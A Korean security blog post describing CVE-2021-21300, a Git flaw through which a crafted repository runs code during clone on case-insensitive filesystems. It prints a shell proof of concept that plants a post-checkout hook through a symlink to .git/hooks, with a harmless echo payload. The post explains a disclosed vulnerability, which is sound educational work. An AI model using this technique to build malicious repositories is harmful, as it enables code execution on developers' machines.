[하루한줄] CVE-2021-21300: Git의 저장소 clone 원격 코드 실행 취약점

URL

git: malicious repositories can execute remote code while cloning

Target

Git(2.14.2.windows.1에서 테스트됨)

Explain

오픈소스 버전 관리 시스템인 Git에서 원격 저장소를 clone 하는 도중 원격 코드 실행이 가능한 취약점이 발견되어 관련 세부 정보가 공개되었습니다.

취약점의 트리거 조건은 다음과 같습니다.

타깃 시스템이 NTFS와 같이 대소문자를 구분하지 않고, 심볼릭 링크를 지원해야 합니다.(Windows 및 macOS의 기본 파일 시스템)
Git LFS와 같이 clean 혹은 smudge 필터가 전역적으로 구성되어있어야 합니다.

악성 저장소를 생성하는 PoC는 다음과 같습니다.

#!/bin/sh

  git init delayed-checkout &&
  (
  	cd delayed-checkout &&
  	echo "A/post-checkout filter=lfs diff=lfs merge=lfs" \\
  		>.gitattributes &&
  	mkdir A &&
  	printf '#!/bin/sh\\n\\necho PWNED >&2\\n' >A/post-checkout &&
  	chmod +x A/post-checkout &&
  	>A/a &&
  	>A/b &&
  	git add -A &&
  	rm -rf A &&
  	ln -s .git/hooks a &&
  	git add a &&
  	git commit -m initial
  )

임의 코드를 실행하는 악성 파일인 A/post-checkout이 저장소에 추가된 후 제거되면 Git 캐시에 남습니다. 이후 ./git/hooks의 심볼릭 링크 a를 생성합니다.
- git hooks - 특정 이벤트에 실행되는 스크립트
타깃이 대소문자를 구분하지 않는 파일 시스템이라면 해당 저장소를 clone 할 때 a와 A를 구분하지 못해 ./git/hooks/post-checkout 파일이 Git 캐시에 저장된 악성파일인 A/post-checkout로 대체됩니다.
git hooks에 의해 post-checkout가 실행되고 post-checkout에 작성된 임의 코드가 실행됩니다.

Reference

POC - https://github.com/Maskhe/CVE-2021-21300

1day1line

cve rce git L0ch

L0ch

본 글은 CC BY-SA 4.0 라이선스로 배포됩니다. 공유 또는 변경 시 반드시 출처를 남겨주시기 바랍니다.

[하루한줄] Guix lpe via guix-daemon Previous

[하루한줄] 안드로이드 틱톡 앱에서 발견된 5가지 취약점 Next